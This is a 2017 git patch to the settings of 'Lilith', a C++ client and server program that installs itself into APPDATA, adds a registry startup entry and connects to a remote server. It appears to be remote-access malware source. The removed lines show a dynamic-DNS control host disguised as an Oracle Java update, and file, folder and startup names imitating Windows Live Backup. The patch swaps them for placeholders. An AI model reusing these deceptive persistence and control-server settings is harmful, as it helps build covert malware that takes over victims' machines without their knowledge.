From 02582bede13e73ab1b7dd452b0097b8cb3e77783 Mon Sep 17 00:00:00 2001 From: Nick Raziborsky Date: Tue, 27 Jun 2017 20:50:48 +0200 Subject: [PATCH] Changed the default settings --- Lilith/settings.cpp | 12 ++++++------ Server/main.cpp | 4 ++-- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/Lilith/settings.cpp b/Lilith/settings.cpp index e98613a..9f09b39 100644 --- a/Lilith/settings.cpp +++ b/Lilith/settings.cpp @@ -2,7 +2,7 @@ #if _DEBUG std::string Settings::serverIP = "127.0.0.1"; //server ip -int Settings::serverPort = 1111; //server port +int Settings::serverPort = 1337; //server port std::string Settings::fileName = "lilithDEBUG.exe"; //file name std::string Settings::folderName = "lilithDEBUG folder"; //name of folder where file is located @@ -17,12 +17,12 @@ bool Settings::logEvents = true; #else -std::string Settings::serverIP = "oraclejavaseupdate.ddns.net"; /*windistupdate.ddns.net*/ //server ip -int Settings::serverPort = 47128; //server port +std::string Settings::serverIP = "sample.ip.net"; /*windistupdate.ddns.net*/ //server ip +int Settings::serverPort = 1337; //server port -std::string Settings::fileName = "winliveback.exe"; //file name -std::string Settings::folderName = "Windows Live"; //name of folder where file is located -std::string Settings::startupName = "Windows Live Backup"; //startup name in registry / taskmgr +std::string Settings::fileName = "lilithRELEASE.exe"; //file name +std::string Settings::folderName = "lilithRELEASE folder"; //name of folder where file is located +std::string Settings::startupName = "lilithRELEASE startup"; //startup name in registry / taskmgr std::string Settings::logFileName = "log.txt"; //name of log file std::string Settings::installLocation = "APPDATA"; //install location (appdata, programdata etc) bool Settings::installSelf = true; //specifies whether the program should install itself diff --git a/Server/main.cpp b/Server/main.cpp index 4586efc..7134b9b 100644 --- a/Server/main.cpp +++ b/Server/main.cpp @@ -3,9 +3,9 @@ int main() { #if _DEBUG - Server MyServer(1111, true); + Server MyServer(1337, true); #else - Server MyServer(47128, true); + Server MyServer(1337, true); #endif MyServer.ListenForNewConnection();